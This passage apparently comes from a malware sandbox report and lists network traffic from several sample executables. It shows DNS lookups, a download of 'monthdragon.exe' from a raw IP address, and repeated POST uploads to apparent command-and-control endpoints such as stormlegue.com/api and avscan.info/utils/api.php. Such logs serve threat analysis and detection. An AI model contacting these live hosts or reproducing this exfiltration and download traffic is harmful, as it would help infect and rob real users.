                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1071
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=g327s07po7lgdiv0qjd2g3hnoj; expires=Fri, 21 Feb 2025 14:08:00 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Obm4P40Yic1fHLstFkKpTDnSdPhsDv%2FpLRAUOh9%2B1LY9lO49yHF%2B1YOGbsbown5CdAEvrhitQpaBuQ4008OAyzysMUZ202IUr0oeOOdEywWaLkLuX4GyIbbgG%2Bb%2F8DXQVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10f24ab448c5-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22261&min_rtt=20698&rtt_var=6900&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3062&recv_bytes=1750&delivery_rate=150565&cwnd=253&unsent_bytes=0&cid=44c50b8b3506c345&ts=256&x=0"
                                                          • flag-us
                                                            DNS
                                                            avscan.info
                                                            apisysDirectx.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            avscan.info
                                                            IN A
                                                            Response
                                                            avscan.info
                                                            IN A
                                                            31.31.196.252
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            DTQCxXZ.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=xhiJ7joWUMMX1QwjEd59Oe1obb6m_NIzi1B.h4XSkKk-1740060479-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 89
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=s46n96hotv8ohefbqvo06a28o4; expires=Fri, 21 Feb 2025 14:08:00 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENBtw2rfMqyx47qyismEfflF3RAmeBHwIWqWCFV2AxHlIKTev4ULw9svuCjtWUv5roA3iFTat3qQkQmrmL7PBt7ackBk4OSE3BMgUnBHgAJyI0ui7xIQogwDJeR6S5ozfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10f43eda9483-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23097&min_rtt=20871&rtt_var=7748&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3062&recv_bytes=758&delivery_rate=137024&cwnd=253&unsent_bytes=0&cid=8003c9ec4bae3dae&ts=235&x=0"
                                                          • flag-ru
                                                            POST
                                                            http://avscan.info/utils/api.php
                                                            apisysDirectx.exe
                                                            Remote address:
                                                            31.31.196.252:80
                                                            Request
                                                            POST /utils/api.php HTTP/1.1
                                                            X-API-KEY: 123
                                                            Content-Type: multipart/form-data; boundary="59c67484-7ce2-420a-8024-3fe81f8e5347"
                                                            Host: avscan.info
                                                            Content-Length: 62169
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:01 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/8.2.27
                                                          • flag-ru
                                                            POST
                                                            http://avscan.info/utils/api.php
                                                            apisysDirectx.exe
                                                            Remote address:
                                                            31.31.196.252:80
                                                            Request
                                                            POST /utils/api.php HTTP/1.1
                                                            X-API-KEY: 123
                                                            Content-Type: multipart/form-data; boundary="7dcef6e2-6162-4fba-90e3-385876c14749"
                                                            Host: avscan.info
                                                            Content-Length: 50512
                                                            Expect: 100-continue
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:09:02 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/8.2.27
                                                          • flag-us
                                                            DNS
                                                            backup.avscan.info
                                                            apisysDirectx.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            backup.avscan.info
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            anotherbackup.avscan.info
                                                            apisysDirectx.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            anotherbackup.avscan.info
                                                            IN A
                                                            Response
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.97/files/FuckMAIN/monthdragon.exe
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.97:80
                                                            Request
                                                            GET /files/FuckMAIN/monthdragon.exe HTTP/1.1
                                                            Host: 185.215.113.97
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:04 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 353280
                                                            Last-Modified: Sun, 16 Feb 2025 19:42:58 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b23fc2-56400"
                                                            Accept-Ranges: bytes
                                                          • flag-us
                                                            DNS
                                                            naturewsounds.help
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            naturewsounds.help
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            monthdragon.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:08:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pt1n3slN5U0ABvU%2FBDTYw%2F5PRDH8PvMk1c%2FPGaf0zACX%2Bzzy%2Fwb8sMO4Mk7TX8iZB8WLPd%2F99OIRaB09h7DN8PeWlhJSDkfHAm4DIw6YAWGmkloBLn83tjoVxrE1Em2R4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f111f5e0646d0-LHR
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            monthdragon.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=HQJu7pKs66qIxxVjJda1yog7BAJIJYFue1qELe9IQus-1740060487-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 53
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=mifjj9pibt52higjrc7hctf6ej; expires=Fri, 21 Feb 2025 14:08:07 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vpn84%2F%2FZKK%2FMgA2Yem0bODyljOfU%2FzmuV3bz3BIJTK%2FnNjL0507hiQ8BWIk%2BV%2FNx3QpNSJa69KYYcysVMD0UdaHkmroCa%2FCBcvnlET1DV8Pv%2Fzc2%2FgEIogjAUA4odDNKpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f111f9ec046d0-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23561&min_rtt=21149&rtt_var=5354&sent=15&recv=13&lost=0&retrans=0&sent_bytes=8335&recv_bytes=1056&delivery_rate=497001&cwnd=257&unsent_bytes=0&cid=5f8394f6eabd4da7&ts=372&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            monthdragon.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=3B79OQW6K7
                                                            Cookie: __cf_mw_byp=HQJu7pKs66qIxxVjJda1yog7BAJIJYFue1qELe9IQus-1740060487-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1587
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=nc302capghj5k7qifdunse7j2s; expires=Fri, 21 Feb 2025 14:08:08 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jpro2sze6sdpfSxPQJ8e8cPpud%2BGwroVOGLl3VgNi35BUZmdFFHp7pWxQjlerUgoymv2AnZAN6Z23MMF%2Bg4%2B4yTOEBIKOo7y6UUjSjRojyeO2xrfXgc%2F9RZzHn2zPzSjSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11217c2546d0-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23248&min_rtt=21022&rtt_var=4643&sent=19&recv=17&lost=0&retrans=0&sent_bytes=9529&recv_bytes=3066&delivery_rate=497001&cwnd=257&unsent_bytes=0&cid=5f8394f6eabd4da7&ts=596&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            monthdragon.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=HDJRWBGF26T0B9
                                                            Cookie: __cf_mw_byp=HQJu7pKs66qIxxVjJda1yog7BAJIJYFue1qELe9IQus-1740060487-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1100
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=qhtjndplu34ndme6kjamuaad1g; expires=Fri, 21 Feb 2025 14:08:08 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F3tJC%2B9FSxSYyb9OnA%2B1DwKYHTDbT%2FWam5VtB4i%2FvXfs7pXOvpdQv4DnFhRU9pj%2FqaWk88YpCaMYBE3EqVmBG9YipTjuBH0wmzdD%2Bs2oko9ZQsgohObnwVryJkwwyB2M%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11258b3acd72-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=39808&min_rtt=39165&rtt_var=15973&sent=8&recv=7&lost=0&retrans=1&sent_bytes=3353&recv_bytes=1798&delivery_rate=50854&cwnd=254&unsent_bytes=0&cid=a3a7d16656357770&ts=619&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            monthdragon.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=HQJu7pKs66qIxxVjJda1yog7BAJIJYFue1qELe9IQus-1740060487-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 87
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=k3evcuml8snmehq6hivsutbtf2; expires=Fri, 21 Feb 2025 14:08:09 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsFuWACbPFzuELtXQowV%2BpFjVcDx6DV1WU20HRypcZvVI3qEaJ0UhEwwjLQ%2FGxQUlaOMFwfDKOhgxjZW76trg3%2FoYVHYCSCAhvdlzgCb8IaL47nzL0GYy0qfxX42pwrcKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1127e99a48c5-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=24352&min_rtt=24169&rtt_var=5397&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3062&recv_bytes=758&delivery_rate=165595&cwnd=253&unsent_bytes=0&cid=90a1f045282af62f&ts=190&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:08:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWet%2BWUnFG43es1oI1V8qnv6F1XMCkQxs%2FrF9vZUOrEWSNs6unHBJkzxcj36rUqWbwrifnK0IiKSJ7riG2FWvAQDAredkpLq6csFhEg8cPU%2BaHkAAIMTozkrwdw2hjV3iA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1147fdb546d0-LHR
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=1YUY6vH837HsPAXmeGRwJ2FDzsP5Cr5fx9ty9cHOzSM-1740060494-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 51
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=i2cek4tma44fmsr2ce1ebrb7rd; expires=Fri, 21 Feb 2025 14:08:14 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7wFyEXKjXjUVSOsi13Y%2Bi%2F6OgrqFc%2FkwWhtGlYjHNGBDNj3e3ixrAR57bV2qmmlcusXscmuPEuadKXBs8t8w2v2BQjrEKyELY6wJBTQCtXIJy%2BVUAO%2FoprLoLJAcen0Obg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11482ea246d0-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=24451&min_rtt=21082&rtt_var=5579&sent=15&recv=13&lost=0&retrans=0&sent_bytes=8336&recv_bytes=1056&delivery_rate=365411&cwnd=257&unsent_bytes=0&cid=e0a155cab4cb33c7&ts=341&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=04OM6K4VKYEPML
                                                            Cookie: __cf_mw_byp=1YUY6vH837HsPAXmeGRwJ2FDzsP5Cr5fx9ty9cHOzSM-1740060494-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1604
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=8t1k3mkrdmcmd2fr9e0cebfnm7; expires=Fri, 21 Feb 2025 14:08:14 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lPmXIOct8a2mOSAQAx1Je2eiQpCkOJdsFv8d24092HgyxLPakxNxSF5poI6P6D3LcT0wGe0jfIFWgDM%2BXGqZnNfSfp%2Fm5UeSRB%2Bx07MiSlBZsn0W%2B6HU4rcr6h5Bf%2Fvpjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f114a1ce446d0-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=24035&min_rtt=21070&rtt_var=5015&sent=19&recv=17&lost=0&retrans=0&sent_bytes=9514&recv_bytes=3098&delivery_rate=365411&cwnd=257&unsent_bytes=0&cid=e0a155cab4cb33c7&ts=537&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=5NXYHRVOTQFUDVG
                                                            Cookie: __cf_mw_byp=1YUY6vH837HsPAXmeGRwJ2FDzsP5Cr5fx9ty9cHOzSM-1740060494-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1101
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=oppoegu6ad5pag1r09c9rqtbhv; expires=Fri, 21 Feb 2025 14:08:14 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JgowdXDOGJX3R6pkSybAEJN7Qlkl30B93D45Y7vtjEsjdd9m0KHlaH52vWtsnTlMn%2BSORwxK4leMnKcVR1u6jXWDPEzO8%2Fco2bbMQS7mMHdkqoiFJOSllB%2BEJYxzVXuYnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f114ba8669483-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23065&min_rtt=21055&rtt_var=6870&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3061&recv_bytes=1798&delivery_rate=161720&cwnd=253&unsent_bytes=0&cid=0bbcccae91c7db24&ts=274&x=0"
                                                          • flag-us
                                                            POST
                                                            https://penetratebatt.pw/api
                                                            f3Ypd8O.exe
                                                            Remote address:
                                                            172.67.161.147:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: penetratebatt.pw
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=k5isaikvsit77a4nshn0r71a7u; expires=Fri, 21 Feb 2025 14:08:14 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gdca5wP9zo4JCRfbpSCHwqPj8jf68OcZhaXYv0VdHCps57MunvI5t7HEVGqB7IUHPNGZO9okIhhAPSiDbrPRs%2FVumcipMd2l9kaA0VrqStOdviU3KjTha2343bIeLcjwECUk"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f114cb94c4195-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=32887&min_rtt=20962&rtt_var=19566&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=147297&cwnd=244&unsent_bytes=0&cid=aa9d9db7540226aa&ts=272&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=1YUY6vH837HsPAXmeGRwJ2FDzsP5Cr5fx9ty9cHOzSM-1740060494-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 85
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=8mhkj8t2216td95nb7cg6ga2f0; expires=Fri, 21 Feb 2025 14:08:15 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BwEEql8zZ3%2BCzcL7BXfIE2tSCYbk0SNr5Z%2FPcLikN9sh5XJNhMVXTW20eZNwUEOWbMarFvgLiAMR6sdpp2wMJQFQxSHprK5%2FI9%2FyHW7Qj6PtjcyfAmCGt%2BjhDLh6TYU%2FKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f114d982f76f9-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22257&min_rtt=20993&rtt_var=6461&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3062&recv_bytes=758&delivery_rate=155198&cwnd=252&unsent_bytes=0&cid=655df881d1d4dcc0&ts=275&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            f3Ypd8O.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:08:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
